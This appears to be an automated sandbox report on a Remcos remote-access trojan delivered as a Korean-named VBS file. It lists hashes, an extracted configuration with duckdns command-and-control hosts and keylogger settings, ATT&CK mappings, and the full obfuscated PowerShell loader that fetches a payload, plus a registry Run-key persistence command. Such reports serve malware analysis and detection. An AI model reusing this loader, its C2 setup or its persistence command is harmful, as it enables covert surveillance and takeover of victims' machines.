remcos | fa7ae981291ded476e9b3764bcdb12f5b84f4f7741c277f047275e5d855c3390

General

Target

화물_계획__부 가능_계획_pdg.vbs
Size

35KB
MD5

4c39309bcbb9c031d27c488bac0ed6ec
SHA1

29e1270f6a8eaa63fa37f33760a3a1d33e807863
SHA256

2b9370b8bd4cf96c6b5f44b84e74a767fa5182ab30638fce31de2616aa01ab50
SHA512

928eeb213f33f015a6424506c2a8d023e636cddc8392774df829dfb56cb22ddc4ccae611f33527665a33d5692e0672d38b0979ddfb86ff4883047cafa0c3aa86
SSDEEP

384:65cVCJUSNoVEItu5uBHNIc6n+210mlT5Ve3qOGHr84F4K:65cXSNhCu5qNIc6+2HlNMqOOr8gx

Score

10^/10

remcos fresh discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

Fresh

C2

dourtes4hnbouy1.duckdns.org:2487

dourtes4hnbouy1.duckdns.org:2488

dourtes4hnbouy2.duckdns.org:2487

dourtes4hnbouy3.duckdns.org:2487

dourtes4hnbouy4.duckdns.org:2487

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
kamzourts.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
kamncbiu-LBXP9X
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 10 IoCs

flow	pid	Process
4	3444	WScript.exe
8	2108	powershell.exe
35	3204	msiexec.exe
37	3204	msiexec.exe
40	3204	msiexec.exe
43	3204	msiexec.exe
48	3204	msiexec.exe
56	3204	msiexec.exe
58	3204	msiexec.exe
66	3204	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rhabdosphere = "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\\Software\\Extratemporal\\').Konkursbegringer;%nervemediciners% ($Decoke247)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2108	powershell.exe
3592	powershell.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2108	powershell.exe
3592	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3204	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3592	powershell.exe
3204	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1300	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2108	powershell.exe
2108	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3592	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	3592	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3204	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3444 wrote to memory of 2108	3444	WScript.exe	84
PID 3444 wrote to memory of 2108	3444	WScript.exe	84
PID 3592 wrote to memory of 3204	3592	powershell.exe	96
PID 3592 wrote to memory of 3204	3592	powershell.exe	96
PID 3592 wrote to memory of 3204	3592	powershell.exe	96
PID 3592 wrote to memory of 3204	3592	powershell.exe	96
PID 3204 wrote to memory of 4872	3204	msiexec.exe	98
PID 3204 wrote to memory of 4872	3204	msiexec.exe	98
PID 3204 wrote to memory of 4872	3204	msiexec.exe	98
PID 4872 wrote to memory of 1300	4872	cmd.exe	100
PID 4872 wrote to memory of 1300	4872	cmd.exe	100
PID 4872 wrote to memory of 1300	4872	cmd.exe	100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\화물_계획__부 가능_계획_pdg.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1e674e03a1292678c1aeab7010a77a6c

SHA1
de005829eda4db62abec97cfeaa98121448da018

SHA256
9bbd6466b0a2aa528cb66cfc3729f91f623b1d5d6d24cb4ebea3159e8284d3ea

SHA512
36dde97decf9342cd5314ea62842bdd0f3c0698eee4a782244879eb07c0a9ca4de8f3dfbb3bc03a5fd1af7720cbd47976a3e44434ae20a900507143bee9e02d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vr5wthwf.aqq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\conventionalises.Tnd

Filesize
417KB

MD5
b8267bb25d5a59bcecb954056bbccd90

SHA1
27984573c59bf3e2d726f3b7b011671caf50fa38

SHA256
8b9e7d853510e474c2781553ba6a59cd2483b30603923a36cd7a9c1ea40b9b3e

SHA512
24aeca3998b197f92ab19a24cf954195fbfa1026dcc19a0e3414ee2ab1cb86afc3e12686b72faeda510288233f57c979b4731f484b96be4429325cadc7d4c4ad

Download Submit
memory/2108-18-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

Filesize
10.8MB

Download
memory/2108-16-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

Filesize
10.8MB

Download
memory/2108-17-0x00007FFA367A3000-0x00007FFA367A5000-memory.dmp

Filesize
8KB

Download
memory/2108-4-0x00007FFA367A3000-0x00007FFA367A5000-memory.dmp

Filesize
8KB

Download
memory/2108-19-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

Filesize
10.8MB

Download
memory/2108-22-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

Filesize
10.8MB

Download
memory/2108-25-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

Filesize
10.8MB

Download
memory/2108-15-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

Filesize
10.8MB

Download
memory/2108-5-0x00000173FF340000-0x00000173FF362000-memory.dmp

Filesize
136KB

Download
memory/3204-60-0x0000000000ED0000-0x0000000002124000-memory.dmp

Filesize
18.3MB

Download
memory/3204-57-0x0000000000ED0000-0x0000000002124000-memory.dmp

Filesize
18.3MB

Download
memory/3592-30-0x0000000005FE0000-0x0000000006046000-memory.dmp

Filesize
408KB

Download
memory/3592-40-0x0000000006110000-0x0000000006464000-memory.dmp

Filesize
3.3MB

Download
memory/3592-29-0x0000000005F70000-0x0000000005FD6000-memory.dmp

Filesize
408KB

Download
memory/3592-42-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/3592-43-0x0000000006790000-0x00000000067DC000-memory.dmp

Filesize
304KB

Download
memory/3592-44-0x0000000007FA0000-0x000000000861A000-memory.dmp

Filesize
6.5MB

